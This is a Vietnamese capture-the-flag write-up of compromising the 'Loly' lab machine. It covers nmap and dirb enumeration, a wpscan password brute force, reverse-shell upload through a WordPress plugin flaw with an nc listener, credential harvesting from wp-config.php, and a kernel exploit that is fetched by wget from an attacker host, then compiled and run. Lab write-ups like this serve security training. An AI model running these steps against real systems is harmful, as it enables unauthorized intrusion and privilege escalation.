Vulhub - Loly
Description
Link lab tại đây
Step
Reconnaissance
Đầu tiên ta sử dụng arp-scan
để quét các địa chỉ IP có trong dải mạng.
Nhận thấy có một IP lạ là 192.168.134.135
.
Sử dụng nmap
để kiểm tra các dịch vụ đang mở trên IP đó
Có cổng 80
đang mở và đang sử dụng nginx 1.10.3
.
Enumeration
Tiến hành quét các directory
bằng dirb
dirb 192.168.134.135
Ta thu được kết quả trang web này sử dụng Wordpress tại endpoint /wordpress
.
Giao diện chính của trang:
Giao diện login
:
Tiến hành brute force
username/password
bằng cách sử dụng wpscan
.
Đầu tiên ta tìm username
:
wpscan -url http://loly.lc/wordpress
Ta thu được username là loly
.
Brute force
password bằng query:
wpscan -url http://loly.lc/wordpress -U loly -P /usr/share/wordlists/rockyou.txt
Thu được mật khẩu: fernando
Tiến hành đăng nhập
Exploitation
Đây là giao diện chính của trang web:
Ta có thể thấy trang web sử dụng 1 plugin
có tên là AdRotale
version 5.8.6.2. Version này cho phép người dùng upload
file zip và giải nén mà không có bất kỳ một phương thức kiểm tra nào:
Ta có thể tận dụng lỗ hổng này để upload reverse-shell . Mở cổng 9001 trên máy attacker bằng query:
nc -nvlp 9001
Bây giờ, truy cập PHP reverse shell bằng cách load lại trang web như hình dưới đây:
Thành công
Có thể nâng cấp shell này python pty
:
python3 -c 'import pty; pty.spawn("/bin/bash")'
Sau đó thử grep
với từ khóa loly
ta tìm được mật khẩu DB có trong file wp-config.php
là lolyisabeautifulgirl
Privilege Escalation
Đầu tiên, ta thử kiểm tra phiên bản kernel
của machine
uname -a
Đây là một phiên bản khá cũ, thử tìm mã khai thác trên google thì thấy một mã khai thác trên exploit-db
:
Ta wget
nó về và compile
:
wget http://192.168.134.134:8000/ex.c
gcc ex.c -o ex
chmod 777 ex
Thực thi file ex
bằng query:
./ex